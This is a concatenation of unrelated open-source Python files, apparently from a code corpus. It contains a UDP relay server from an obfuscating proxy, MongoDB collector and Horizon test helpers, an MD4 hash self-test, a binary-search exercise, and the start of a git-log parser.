def __init__(self, config, dns_resolver, is_local, stat_callback=None, stat_counter=None):
self._config = config
if config.get('connect_verbose_info', 0) > 0:
common.connect_log = logging.info
if is_local:
self._listen_addr = config['local_address']
self._listen_port = config['local_port']
self._remote_addr = config['server']
self._remote_port = config['server_port']
else:
self._listen_addr = config['server']
self._listen_port = config['server_port']
self._remote_addr = None
self._remote_port = None
self._dns_resolver = dns_resolver
self._password = common.to_bytes(config['password'])
self._method = config['method']
self._timeout = config['timeout']
self._is_local = is_local
self._udp_cache_size = config['udp_cache']
self._cache = lru_cache.LRUCache(timeout=config['udp_timeout'],
close_callback=self._close_client_pair)
self._cache_dns_client = lru_cache.LRUCache(timeout=10,
close_callback=self._close_client_pair)
self._client_fd_to_server_addr = {}
#self._dns_cache = lru_cache.LRUCache(timeout=1800)
self._eventloop = None
self._closed = False
self.server_transfer_ul = 0
self.server_transfer_dl = 0
self.server_users = {}
self.server_user_transfer_ul = {}
self.server_user_transfer_dl = {}
if common.to_bytes(config['protocol']) in obfs.mu_protocol():
self._update_users(None, None)
self.protocol_data = obfs.obfs(config['protocol']).init_data()
self._protocol = obfs.obfs(config['protocol'])
server_info = obfs.server_info(self.protocol_data)
server_info.host = self._listen_addr
server_info.port = self._listen_port
server_info.users = self.server_users
server_info.protocol_param = config['protocol_param']
server_info.obfs_param = ''
server_info.iv = b''
server_info.recv_iv = b''
server_info.key_str = common.to_bytes(config['password'])
server_info.key = encrypt.encrypt_key(self._password, self._method)
server_info.head_len = 30
server_info.tcp_mss = 1452
server_info.buffer_size = BUF_SIZE
server_info.overhead = 0
self._protocol.set_server_info(server_info)
self._sockets = set()
self._fd_to_handlers = {}
self._reqid_to_hd = {}
self._data_to_write_to_server_socket = []
self._timeout_cache = lru_cache.LRUCache(timeout=self._timeout,
close_callback=self._close_tcp_client)
self._bind = config.get('out_bind', '')
self._bindv6 = config.get('out_bindv6', '')
self._ignore_bind_list = config.get('ignore_bind', [])
if 'forbidden_ip' in config:
self._forbidden_iplist = config['forbidden_ip']
else:
self._forbidden_iplist = None
if 'forbidden_port' in config:
self._forbidden_portset = config['forbidden_port']
else:
self._forbidden_portset = None
addrs = socket.getaddrinfo(self._listen_addr, self._listen_port, 0,
socket.SOCK_DGRAM, socket.SOL_UDP)
if len(addrs) == 0:
raise Exception("can't get addrinfo for %s:%d" %
(self._listen_addr, self._listen_port))
af, socktype, proto, canonname, sa = addrs[0]
server_socket = socket.socket(af, socktype, proto)
server_socket.bind((self._listen_addr, self._listen_port))
server_socket.setblocking(False)
self._server_socket = server_socket
self._stat_callback = stat_callback
def _get_a_server(self):
server = self._config['server']
server_port = self._config['server_port']
if type(server_port) == list:
server_port = random.choice(server_port)
if type(server) == list:
server = random.choice(server)
logging.debug('chosen server: %s:%d', server, server_port)
return server, server_port
def get_ud(self):
return (self.server_transfer_ul, self.server_transfer_dl)
def get_users_ud(self):
ret = (self.server_user_transfer_ul.copy(), self.server_user_transfer_dl.copy())
return ret
def _update_users(self, protocol_param, acl):
if protocol_param is None:
protocol_param = self._config['protocol_param']
param = common.to_bytes(protocol_param).split(b'#')
if len(param) == 2:
user_list = param[1].split(b',')
if user_list:
for user in user_list:
items = user.split(b':')
if len(items) == 2:
user_int_id = int(items[0])
uid = struct.pack('<I', user_int_id)
if acl is not None and user_int_id not in acl:
self.del_user(uid)
else:
passwd = items[1]
self.add_user(uid, {'password':passwd})
def _update_user(self, id, passwd):
uid = struct.pack('<I', id)
self.add_user(uid, passwd)
def update_users(self, users):
for uid in list(self.server_users.keys()):
id = struct.unpack('<I', uid)[0]
if id not in users:
self.del_user(uid)
for id in users:
uid = struct.pack('<I', id)
self.add_user(uid, users[id])
def add_user(self, uid, cfg): # user: binstr[4], passwd: str
passwd = cfg['password']
self.server_users[uid] = common.to_bytes(passwd)
def del_user(self, uid):
if uid in self.server_users:
del self.server_users[uid]
def add_transfer_u(self, user, transfer):
if user is None:
self.server_transfer_ul += transfer
else:
if user not in self.server_user_transfer_ul:
self.server_user_transfer_ul[user] = 0
self.server_user_transfer_ul[user] += transfer + self.server_transfer_ul
self.server_transfer_ul = 0
def add_transfer_d(self, user, transfer):
if user is None:
self.server_transfer_dl += transfer
else:
if user not in self.server_user_transfer_dl:
self.server_user_transfer_dl[user] = 0
self.server_user_transfer_dl[user] += transfer + self.server_transfer_dl
self.server_transfer_dl = 0
def _close_client_pair(self, client_pair):
client, uid = client_pair
self._close_client(client)
def _close_client(self, client):
if hasattr(client, 'close'):
if not self._is_local:
if client.fileno() in self._client_fd_to_server_addr:
logging.debug('close_client: %s' %
(self._client_fd_to_server_addr[client.fileno()],))
else:
client.info('close_client')
self._sockets.remove(client.fileno())
self._eventloop.remove(client)
del self._client_fd_to_server_addr[client.fileno()]
client.close()
else:
# just an address
client.info('close_client pass %s' % client)
pass
def _handel_protocol_error(self, client_address, ogn_data):
#raise Exception('can not parse header')
logging.warn("Protocol ERROR, UDP ogn data %s from %s:%d" % (binascii.hexlify(ogn_data), client_address[0], client_address[1]))
def _socket_bind_addr(self, sock, af):
bind_addr = ''
if self._bind and af == socket.AF_INET:
bind_addr = self._bind
elif self._bindv6 and af == socket.AF_INET6:
bind_addr = self._bindv6
bind_addr = bind_addr.replace("::ffff:", "")
if bind_addr in self._ignore_bind_list:
bind_addr = None
if bind_addr:
local_addrs = socket.getaddrinfo(bind_addr, 0, 0, socket.SOCK_DGRAM, socket.SOL_UDP)
if local_addrs[0][0] == af:
logging.debug("bind %s" % (bind_addr,))
try:
sock.bind((bind_addr, 0))
except Exception as e:
logging.warn("bind %s fail" % (bind_addr,))
def _handle_server(self):
server = self._server_socket
data, r_addr = server.recvfrom(BUF_SIZE)
ogn_data = data
if not data:
logging.debug('UDP handle_server: data is empty')
if self._stat_callback:
self._stat_callback(self._listen_port, len(data))
uid = None
if self._is_local:
frag = common.ord(data[2])
if frag != 0:
logging.warn('drop a message since frag is not 0')
return
else:
data = data[3:]
else:
ref_iv = [0]
data = encrypt.encrypt_all_iv(self._protocol.obfs.server_info.key, self._method, 0, data, ref_iv)
# decrypt data
if not data:
logging.debug('UDP handle_server: data is empty after decrypt')
return
self._protocol.obfs.server_info.recv_iv = ref_iv[0]
data, uid = self._protocol.server_udp_post_decrypt(data)
#logging.info("UDP data %s" % (binascii.hexlify(data),))
if not self._is_local:
data = pre_parse_header(data)
if data is None:
return
try:
header_result = parse_header(data)
except:
self._handel_protocol_error(r_addr, ogn_data)
return
if header_result is None:
self._handel_protocol_error(r_addr, ogn_data)
return
connecttype, addrtype, dest_addr, dest_port, header_length = header_result
if self._is_local:
addrtype = 3
server_addr, server_port = self._get_a_server()
else:
server_addr, server_port = dest_addr, dest_port
if (addrtype & 7) == 3:
af = common.is_ip(server_addr)
if af == False:
handler = common.UDPAsyncDNSHandler((data, r_addr, uid, header_length))
handler.resolve(self._dns_resolver, (server_addr, server_port), self._handle_server_dns_resolved)
else:
self._handle_server_dns_resolved("", (server_addr, server_port), server_addr, (data, r_addr, uid, header_length))
else:
self._handle_server_dns_resolved("", (server_addr, server_port), server_addr, (data, r_addr, uid, header_length))
def _handle_server_dns_resolved(self, error, remote_addr, server_addr, params):
if error:
return
data, r_addr, uid, header_length = params
user_id = self._listen_port
try:
server_port = remote_addr[1]
addrs = socket.getaddrinfo(server_addr, server_port, 0,
socket.SOCK_DGRAM, socket.SOL_UDP)
if not addrs: # drop
return
af, socktype, proto, canonname, sa = addrs[0]
server_addr = sa[0]
key = client_key(r_addr, af)
client_pair = self._cache.get(key, None)
if client_pair is None:
client_pair = self._cache_dns_client.get(key, None)
if client_pair is None:
if self._forbidden_iplist:
if common.to_str(sa[0]) in self._forbidden_iplist:
logging.debug('IP %s is in forbidden list, drop' % common.to_str(sa[0]))
# drop
return
if self._forbidden_portset:
if sa[1] in self._forbidden_portset:
logging.debug('Port %d is in forbidden list, reject' % sa[1])
# drop
return
client = socket.socket(af, socktype, proto)
client_uid = uid
client.setblocking(False)
self._socket_bind_addr(client, af)
is_dns = False
if len(data) > header_length + 13 and data[header_length + 4 : header_length + 12] == b"\x00\x01\x00\x00\x00\x00\x00\x00":
is_dns = True
else:
pass
if sa[1] == 53 and is_dns: #DNS
logging.debug("DNS query %s from %s:%d" % (common.to_str(sa[0]), r_addr[0], r_addr[1]))
self._cache_dns_client[key] = (client, uid)
else:
self._cache[key] = (client, uid)
self._client_fd_to_server_addr[client.fileno()] = (r_addr, af)
self._sockets.add(client.fileno())
self._eventloop.add(client, eventloop.POLL_IN, self)
logging.debug('UDP port %5d sockets %d' % (self._listen_port, len(self._sockets)))
if uid is not None:
user_id = struct.unpack('<I', client_uid)[0]
else:
client, client_uid = client_pair
self._cache.clear(self._udp_cache_size)
self._cache_dns_client.clear(16)
if self._is_local:
ref_iv = [encrypt.encrypt_new_iv(self._method)]
self._protocol.obfs.server_info.iv = ref_iv[0]
data = self._protocol.client_udp_pre_encrypt(data)
#logging.debug("%s" % (binascii.hexlify(data),))
data = encrypt.encrypt_all_iv(self._protocol.obfs.server_info.key, self._method, 1, data, ref_iv)
if not data:
return
else:
data = data[header_length:]
if not data:
return
except Exception as e:
shell.print_exception(e)
logging.error("exception from user %d" % (user_id,))
try:
client.sendto(data, (server_addr, server_port))
self.add_transfer_u(client_uid, len(data))
if client_pair is None: # new request
addr, port = client.getsockname()[:2]
common.connect_log('UDP data to %s(%s):%d from %s:%d by user %d' %
(common.to_str(remote_addr[0]), common.to_str(server_addr), server_port, addr, port, user_id))
except IOError as e:
err = eventloop.errno_from_exception(e)
logging.warning('IOError sendto %s:%d by user %d' % (server_addr, server_port, user_id))
if err in (errno.EINPROGRESS, errno.EAGAIN):
pass
else:
shell.print_exception(e)
def _handle_client(self, sock):
data, r_addr = sock.recvfrom(BUF_SIZE)
if not data:
logging.debug('UDP handle_client: data is empty')
return
if self._stat_callback:
self._stat_callback(self._listen_port, len(data))
client_addr = self._client_fd_to_server_addr.get(sock.fileno())
client_uid = None
if client_addr:
key = client_key(client_addr[0], client_addr[1])
client_pair = self._cache.get(key, None)
client_dns_pair = self._cache_dns_client.get(key, None)
if client_pair:
client, client_uid = client_pair
elif client_dns_pair:
client, client_uid = client_dns_pair
if not self._is_local:
addrlen = len(r_addr[0])
if addrlen > 255:
# drop
return
data = pack_addr(r_addr[0]) + struct.pack('>H', r_addr[1]) + data
ref_iv = [encrypt.encrypt_new_iv(self._method)]
self._protocol.obfs.server_info.iv = ref_iv[0]
data = self._protocol.server_udp_pre_encrypt(data, client_uid)
response = encrypt.encrypt_all_iv(self._protocol.obfs.server_info.key, self._method, 1,
data, ref_iv)
if not response:
return
else:
ref_iv = [0]
data = encrypt.encrypt_all_iv(self._protocol.obfs.server_info.key, self._method, 0,
data, ref_iv)
if not data:
return
self._protocol.obfs.server_info.recv_iv = ref_iv[0]
data = self._protocol.client_udp_post_decrypt(data)
header_result = parse_header(data)
if header_result is None:
return
#connecttype, dest_addr, dest_port, header_length = header_result
#logging.debug('UDP handle_client %s:%d to %s:%d' % (common.to_str(r_addr[0]), r_addr[1], dest_addr, dest_port))
response = b'\x00\x00\x00' + data
if client_addr:
if client_uid:
self.add_transfer_d(client_uid, len(response))
else:
self.server_transfer_dl += len(response)
self.write_to_server_socket(response, client_addr[0])
if client_dns_pair:
logging.debug("remove dns client %s:%d" % (client_addr[0][0], client_addr[0][1]))
del self._cache_dns_client[key]
self._close_client(client_dns_pair[0])
else:
# this packet is from somewhere else we know
# simply drop that packet
pass
def write_to_server_socket(self, data, addr):
uncomplete = False
retry = 0
try:
self._server_socket.sendto(data, addr)
data = None
while self._data_to_write_to_server_socket:
data_buf = self._data_to_write_to_server_socket[0]
retry = data_buf[1] + 1
del self._data_to_write_to_server_socket[0]
data, addr = data_buf[0]
self._server_socket.sendto(data, addr)
except (OSError, IOError) as e:
error_no = eventloop.errno_from_exception(e)
uncomplete = True
if error_no in (errno.EWOULDBLOCK,):
pass
else:
shell.print_exception(e)
return False
#if uncomplete and data is not None and retry < 3:
# self._data_to_write_to_server_socket.append([(data, addr), retry])
#'''
def add_to_loop(self, loop):
if self._eventloop:
raise Exception('already add to loop')
if self._closed:
raise Exception('already closed')
self._eventloop = loop
server_socket = self._server_socket
self._eventloop.add(server_socket,
eventloop.POLL_IN | eventloop.POLL_ERR, self)
loop.add_periodic(self.handle_periodic)
def remove_handler(self, client):
if hash(client) in self._timeout_cache:
del self._timeout_cache[hash(client)]
def update_activity(self, client):
self._timeout_cache[hash(client)] = client
def _sweep_timeout(self):
self._timeout_cache.sweep()
def _close_tcp_client(self, client):
if client.remote_address:
logging.debug('timed out: %s:%d' %
client.remote_address)
else:
logging.debug('timed out')
client.destroy()
client.destroy_local()
def handle_event(self, sock, fd, event):
if sock == self._server_socket:
if event & eventloop.POLL_ERR:
logging.error('UDP server_socket err')
try:
self._handle_server()
except Exception as e:
shell.print_exception(e)
if self._config['verbose']:
traceback.print_exc()
elif sock and (fd in self._sockets):
if event & eventloop.POLL_ERR:
logging.error('UDP client_socket err')
try:
self._handle_client(sock)
except Exception as e:
shell.print_exception(e)
if self._config['verbose']:
traceback.print_exc()
else:
if sock:
handler = self._fd_to_handlers.get(fd, None)
if handler:
handler.handle_event(sock, event)
else:
logging.warn('poll removed fd')
def handle_periodic(self):
if self._closed:
self._cache.clear(0)
self._cache_dns_client.clear(0)
if self._eventloop:
self._eventloop.remove_periodic(self.handle_periodic)
self._eventloop.remove(self._server_socket)
if self._server_socket:
self._server_socket.close()
self._server_socket = None
logging.info('closed UDP port %d', self._listen_port)
else:
before_sweep_size = len(self._sockets)
self._cache.sweep()
self._cache_dns_client.sweep()
if before_sweep_size != len(self._sockets):
logging.debug('UDP port %5d sockets %d' % (self._listen_port, len(self._sockets)))
self._sweep_timeout()
def close(self, next_tick=False):
logging.debug('UDP close')
self._closed = True
if not next_tick:
if self._eventloop:
self._eventloop.remove_periodic(self.handle_periodic)
self._eventloop.remove(self._server_socket)
self._server_socket.close()
self._cache.clear(0)
self._cache_dns_client.clear(0)
| gpl-2.0 |
datafiniti/Diamond | src/collectors/mongodb/test/testmongodb.py | 2 | 10560 | #!/usr/bin/python
# coding=utf-8
################################################################################
from test import CollectorTestCase
from test import get_collector_config
from test import unittest
from test import run_only
from mock import MagicMock
from mock import patch
from mock import call
from diamond.collector import Collector
from mongodb import MongoDBCollector
################################################################################
def run_only_if_pymongo_is_available(func):
try:
import pymongo
pymongo # workaround for pyflakes issue #13
except ImportError:
pymongo = None
pred = lambda: pymongo is not None
return run_only(func, pred)
class TestMongoDBCollector(CollectorTestCase):
def setUp(self):
config = get_collector_config('MongoDBCollector', {
'host': 'localhost:27017',
'databases': '^db',
})
self.collector = MongoDBCollector(config, None)
self.connection = MagicMock()
def test_import(self):
self.assertTrue(MongoDBCollector)
@run_only_if_pymongo_is_available
@patch('pymongo.Connection')
@patch.object(Collector, 'publish')
def test_should_publish_nested_keys_for_server_stats(self,
publish_mock,
connector_mock):
data = {'more_keys': {'nested_key': 1}, 'key': 2, 'string': 'str'}
self._annotate_connection(connector_mock, data)
self.collector.collect()
self.connection.db.command.assert_called_once_with('serverStatus')
self.assertPublishedMany(publish_mock, {
'more_keys.nested_key': 1,
'key': 2
})
@run_only_if_pymongo_is_available
@patch('pymongo.Connection')
@patch.object(Collector, 'publish')
def test_should_publish_nested_keys_for_db_stats(self,
publish_mock,
connector_mock):
data = {'db_keys': {'db_nested_key': 1}, 'dbkey': 2, 'dbstring': 'str'}
self._annotate_connection(connector_mock, data)
self.collector.collect()
self.connection['db1'].command.assert_called_once_with('dbStats')
metrics = {
'db_keys.db_nested_key': 1,
'dbkey': 2
}
self.setDocExample(collector=self.collector.__class__.__name__,
metrics=metrics,
defaultpath=self.collector.config['path'])
self.assertPublishedMany(publish_mock, metrics)
@run_only_if_pymongo_is_available
@patch('pymongo.Connection')
@patch.object(Collector, 'publish')
def test_should_publish_stats_with_long_type(self,
publish_mock,
connector_mock):
data = {'more_keys': long(1), 'key': 2, 'string': 'str'}
self._annotate_connection(connector_mock, data)
self.collector.collect()
self.connection.db.command.assert_called_once_with('serverStatus')
self.assertPublishedMany(publish_mock, {
'more_keys': 1,
'key': 2
})
@run_only_if_pymongo_is_available
@patch('pymongo.Connection')
@patch.object(Collector, 'publish')
def test_should_ignore_unneeded_databases(self,
publish_mock,
connector_mock):
self._annotate_connection(connector_mock, {})
self.collector.collect()
assert call('baddb') not in self.connection.__getitem__.call_args_list
@run_only_if_pymongo_is_available
@patch('pymongo.Connection')
@patch.object(Collector, 'publish')
def test_should_ignore_unneeded_collections(self,
publish_mock,
connector_mock):
data = {'more_keys': long(1), 'key': 2, 'string': 'str'}
self._annotate_connection(connector_mock, data)
self.connection['db1'].collection_names.return_value = ['collection1',
'tmp.mr.tmp1']
self.connection['db1'].command.return_value = {'key': 2,
'string': 'str'}
self.collector.collect()
self.connection.db.command.assert_called_once_with('serverStatus')
self.connection['db1'].collection_names.assert_called_once_with()
self.connection['db1'].command.assert_any_call('dbStats')
self.connection['db1'].command.assert_any_call('collstats',
'collection1')
assert call('collstats', 'tmp.mr.tmp1') not in \
self.connection['db1'].command.call_args_list
metrics = {
'databases.db1.collection1.key': 2,
}
self.assertPublishedMany(publish_mock, metrics)
def _annotate_connection(self, connector_mock, data):
connector_mock.return_value = self.connection
self.connection.db.command.return_value = data
self.connection.database_names.return_value = ['db1', 'baddb']
class TestMongoMultiHostDBCollector(CollectorTestCase):
def setUp(self):
config = get_collector_config('MongoDBCollector', {
'hosts': ['localhost:27017', 'localhost:27057'],
'databases': '^db',
})
self.collector = MongoDBCollector(config, None)
self.connection = MagicMock()
def test_import(self):
self.assertTrue(MongoDBCollector)
@run_only_if_pymongo_is_available
@patch('pymongo.Connection')
@patch.object(Collector, 'publish')
def test_should_publish_nested_keys_for_server_stats(self,
publish_mock,
connector_mock):
data = {'more_keys': {'nested_key': 1}, 'key': 2, 'string': 'str'}
self._annotate_connection(connector_mock, data)
self.collector.collect()
self.connection.db.command.assert_called_with('serverStatus')
self.assertPublishedMany(publish_mock, {
'localhost_27017.more_keys.nested_key': 1,
'localhost_27057.more_keys.nested_key': 1,
'localhost_27017.key': 2,
'localhost_27057.key': 2
})
@run_only_if_pymongo_is_available
@patch('pymongo.Connection')
@patch.object(Collector, 'publish')
def test_should_publish_nested_keys_for_db_stats(self,
publish_mock,
connector_mock):
data = {'db_keys': {'db_nested_key': 1}, 'dbkey': 2, 'dbstring': 'str'}
self._annotate_connection(connector_mock, data)
self.collector.collect()
self.connection['db1'].command.assert_called_with('dbStats')
metrics = {
'localhost_27017.db_keys.db_nested_key': 1,
'localhost_27057.db_keys.db_nested_key': 1,
'localhost_27017.dbkey': 2,
'localhost_27057.dbkey': 2
}
self.setDocExample(collector=self.collector.__class__.__name__,
metrics=metrics,
defaultpath=self.collector.config['path'])
self.assertPublishedMany(publish_mock, metrics)
@run_only_if_pymongo_is_available
@patch('pymongo.Connection')
@patch.object(Collector, 'publish')
def test_should_publish_stats_with_long_type(self,
publish_mock,
connector_mock):
data = {'more_keys': long(1), 'key': 2, 'string': 'str'}
self._annotate_connection(connector_mock, data)
self.collector.collect()
self.connection.db.command.assert_called_with('serverStatus')
self.assertPublishedMany(publish_mock, {
'localhost_27017.more_keys': 1,
'localhost_27057.more_keys': 1,
'localhost_27017.key': 2,
'localhost_27057.key': 2
})
@run_only_if_pymongo_is_available
@patch('pymongo.Connection')
@patch.object(Collector, 'publish')
def test_should_ignore_unneeded_databases(self,
publish_mock,
connector_mock):
self._annotate_connection(connector_mock, {})
self.collector.collect()
assert call('baddb') not in self.connection.__getitem__.call_args_list
@run_only_if_pymongo_is_available
@patch('pymongo.Connection')
@patch.object(Collector, 'publish')
def test_should_ignore_unneeded_collections(self,
publish_mock,
connector_mock):
data = {'more_keys': long(1), 'key': 2, 'string': 'str'}
self._annotate_connection(connector_mock, data)
self.connection['db1'].collection_names.return_value = ['collection1',
'tmp.mr.tmp1']
self.connection['db1'].command.return_value = {'key': 2,
'string': 'str'}
self.collector.collect()
self.connection.db.command.assert_called_with('serverStatus')
self.connection['db1'].collection_names.assert_called_with()
self.connection['db1'].command.assert_any_call('dbStats')
self.connection['db1'].command.assert_any_call('collstats',
'collection1')
assert call('collstats', 'tmp.mr.tmp1') not in \
self.connection['db1'].command.call_args_list
metrics = {
'localhost_27017.databases.db1.collection1.key': 2,
'localhost_27057.databases.db1.collection1.key': 2,
}
self.assertPublishedMany(publish_mock, metrics)
def _annotate_connection(self, connector_mock, data):
connector_mock.return_value = self.connection
self.connection.db.command.return_value = data
self.connection.database_names.return_value = ['db1', 'baddb']
################################################################################
if __name__ == "__main__":
unittest.main()
| mit |
deepakselvaraj/federated-horizon | horizon/test/helpers.py | 1 | 7377 | # vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2012 United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration.
# All Rights Reserved.
#
# Copyright 2012 Nebula, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import logging
import os
import socket
from django.contrib.auth.middleware import AuthenticationMiddleware # noqa
from django.contrib.auth.models import Permission # noqa
from django.contrib.auth.models import User # noqa
from django.contrib.contenttypes.models import ContentType # noqa
from django.contrib.messages.storage import default_storage # noqa
from django.core.handlers import wsgi
from django import http
from django import test as django_test
from django.test.client import RequestFactory # noqa
from django.utils import unittest
LOG = logging.getLogger(__name__)
try:
from selenium.webdriver.firefox.webdriver import WebDriver # noqa
from selenium.webdriver.support import ui as selenium_ui
except ImportError as e:
# NOTE(saschpe): Several distribution can't ship selenium due to it's
# non-free license. So they have to patch it out of test-requirements.txt
# Avoid import failure and force not running selenium tests.
LOG.warning("{0}, force WITH_SELENIUM=False".format(str(e)))
os.environ['WITH_SELENIUM'] = ''
import mox
from horizon import middleware
# Makes output of failing mox tests much easier to read.
wsgi.WSGIRequest.__repr__ = lambda self: "<class 'django.http.HttpRequest'>"
class RequestFactoryWithMessages(RequestFactory):
def get(self, *args, **kwargs):
req = super(RequestFactoryWithMessages, self).get(*args, **kwargs)
req.user = User()
req.session = []
req._messages = default_storage(req)
return req
def post(self, *args, **kwargs):
req = super(RequestFactoryWithMessages, self).post(*args, **kwargs)
req.user = User()
req.session = []
req._messages = default_storage(req)
return req
@unittest.skipIf(os.environ.get('SKIP_UNITTESTS', False),
"The SKIP_UNITTESTS env variable is set.")
class TestCase(django_test.TestCase):
"""
Specialized base test case class for Horizon which gives access to
numerous additional features:
* The ``mox`` mocking framework via ``self.mox``.
* A ``RequestFactory`` class which supports Django's ``contrib.messages``
framework via ``self.factory``.
* A ready-to-go request object via ``self.request``.
"""
def setUp(self):
self.mox = mox.Mox()
self.factory = RequestFactoryWithMessages()
self.user = User.objects.create_user(username='test', password='test')
self.assertTrue(self.client.login(username="test", password="test"))
self.request = http.HttpRequest()
self.request.session = self.client._session()
middleware.HorizonMiddleware().process_request(self.request)
AuthenticationMiddleware().process_request(self.request)
os.environ["HORIZON_TEST_RUN"] = "True"
def tearDown(self):
self.mox.UnsetStubs()
self.mox.VerifyAll()
del os.environ["HORIZON_TEST_RUN"]
def set_permissions(self, permissions=None):
perm_ids = Permission.objects.values_list('id', flat=True)
self.user.user_permissions.remove(*perm_ids)
for name in permissions:
ct, create = ContentType.objects.get_or_create(model=name,
app_label='horizon')
perm, create = Permission.objects.get_or_create(codename=name,
content_type=ct,
name=name)
self.user.user_permissions.add(perm)
if hasattr(self.user, "_perm_cache"):
del self.user._perm_cache
def assertNoMessages(self, response=None):
"""
Asserts that no messages have been attached by the ``contrib.messages``
framework.
"""
self.assertMessageCount(response, success=0, warn=0, info=0, error=0)
def assertMessageCount(self, response=None, **kwargs):
"""
Asserts that the specified number of messages have been attached
for various message types. Usage would look like
``self.assertMessageCount(success=1)``.
"""
temp_req = self.client.request(**{'wsgi.input': None})
temp_req.COOKIES = self.client.cookies
storage = default_storage(temp_req)
messages = []
if response is None:
# To gain early access to the messages we have to decode the
# cookie on the test client.
if 'messages' in self.client.cookies:
message_cookie = self.client.cookies['messages'].value
messages = storage._decode(message_cookie)
# Check for messages in the context
elif hasattr(response, "context") and "messages" in response.context:
messages = response.context["messages"]
# Check for messages attached to the request on a TemplateResponse
elif hasattr(response, "_request") and hasattr(response._request,
"_messages"):
messages = response._request._messages._queued_messages
# If we don't have messages and we don't expect messages, we're done.
if not any(kwargs.values()) and not messages:
return
# If we expected messages and have none, that's a problem.
if any(kwargs.values()) and not messages:
error_msg = "Messages were expected, but none were set."
assert 0 == sum(kwargs.values()), error_msg
# Otherwise, make sure we got the expected messages.
for msg_type, count in kwargs.items():
msgs = [m.message for m in messages if msg_type in m.tags]
assert len(msgs) == count, \
"%s messages not as expected: %s" % (msg_type.title(),
", ".join(msgs))
@unittest.skipUnless(os.environ.get('WITH_SELENIUM', False),
"The WITH_SELENIUM env variable is not set.")
class SeleniumTestCase(django_test.LiveServerTestCase):
@classmethod
def setUpClass(cls):
if os.environ.get('WITH_SELENIUM', False):
cls.selenium = WebDriver()
super(SeleniumTestCase, cls).setUpClass()
@classmethod
def tearDownClass(cls):
if os.environ.get('WITH_SELENIUM', False):
cls.selenium.quit()
super(SeleniumTestCase, cls).tearDownClass()
def setUp(self):
socket.setdefaulttimeout(10)
self.ui = selenium_ui
super(SeleniumTestCase, self).setUp()
| apache-2.0 |
wemanuel/smry | smry/Crypto/SelfTest/Hash/test_MD4.py | 116 | 2368 | # -*- coding: utf-8 -*-
#
# SelfTest/Hash/MD4.py: Self-test for the MD4 hash function
#
# Written in 2008 by Dwayne C. Litzenberger <dlitz@dlitz.net>
#
# ===================================================================
# The contents of this file are dedicated to the public domain. To
# the extent that dedication to the public domain is not available,
# everyone is granted a worldwide, perpetual, royalty-free,
# non-exclusive license to exercise all rights associated with the
# contents of this file for any purpose whatsoever.
# No rights are reserved.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
# ===================================================================
"""Self-test suite for Crypto.Hash.MD4"""
__revision__ = "$Id$"
from Crypto.Util.py3compat import *
# This is a list of (expected_result, input[, description]) tuples.
test_data = [
# Test vectors from RFC 1320
('31d6cfe0d16ae931b73c59d7e0c089c0', '', "'' (empty string)"),
('bde52cb31de33e46245e05fbdbd6fb24', 'a'),
('a448017aaf21d8525fc10ae87aa6729d', 'abc'),
('d9130a8164549fe818874806e1c7014b', 'message digest'),
('d79e1c308aa5bbcdeea8ed63df412da9', 'abcdefghijklmnopqrstuvwxyz',
'a-z'),
('043f8582f241db351ce627e153e7f0e4',
'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789',
'A-Z, a-z, 0-9'),
('e33b4ddc9c38f2199c3e7b164fcc0536',
'1234567890123456789012345678901234567890123456'
+ '7890123456789012345678901234567890',
"'1234567890' * 8"),
]
def get_tests(config={}):
from Crypto.Hash import MD4
from common import make_hash_tests
return make_hash_tests(MD4, "MD4", test_data,
digest_size=16,
oid="\x06\x08\x2a\x86\x48\x86\xf7\x0d\x02\x04")
if __name__ == '__main__':
import unittest
suite = lambda: unittest.TestSuite(get_tests())
unittest.main(defaultTest='suite')
# vim:set ts=4 sw=4 sts=4 expandtab:
| apache-2.0 |
stonemary/lintcode_solutions | first-position-of-target/1-3.py | 1 | 1028 | # time 15
# 2:40
# improvement on the last version: prevent overflow
class Solution:
# @param nums: The integer array
# @param target: Target number to find
# @return the first position of target in nums, position start from 0
def binarySearch(self, nums, target):
# iterative
if nums is None or nums == []:
return -1
start = 0
end = len(nums) - 1
mid = (start + end) / 2
last_mid = None
while start + 1 < end:
# for first item
if nums[mid] == target:
last_mid = mid
end = mid
if nums[mid] < target:
start = mid
if nums[mid] > target:
end = mid
# overflow prevention
mid = start - (start - end) / 2
if nums[start] == target:
return start
if nums[end] == target:
return end
return -1
| apache-2.0 |
pasinskim/integration | extra/gitdm/gitdm/gitlog.py | 2 | 5044 | #
# Stuff for dealing with the git log output.
#
# Someday this will be the only version of grabpatch, honest.
#
import re, rfc822, datetime
from patterns import patterns
import database
#
# Input file handling. Someday it would be good to make this smarter
# so that it handles running git with the right options and such.
#
# Someday.
#
SavedLine = ''
def getline(input):
global SavedLine
if SavedLine:
ret = SavedLine
SavedLine = ''
return ret
l = input.readline()
if l:
return l.rstrip()
return None
def SaveLine(line):
global SavedLine
SavedLine = line
#
# A simple state machine based on where we are in the patch. The
# first stuff we get is the header.
#
S_HEADER = 0
#
# Then comes the single-line description.
#
S_DESC = 1
#
# ...the full changelog...
#
S_CHANGELOG = 2
#
# ...the tag section....
#
S_TAGS = 3
#
# ...the numstat section.
#
S_NUMSTAT = 4
S_DONE = 5
#
# The functions to handle each of these states.
#
def get_header(patch, line, input):
if line == '':
if patch.author == '':
print 'Funky auth line in', patch.commit
patch.author = database.LookupStoreHacker('Unknown',
'unknown@hacker.net')
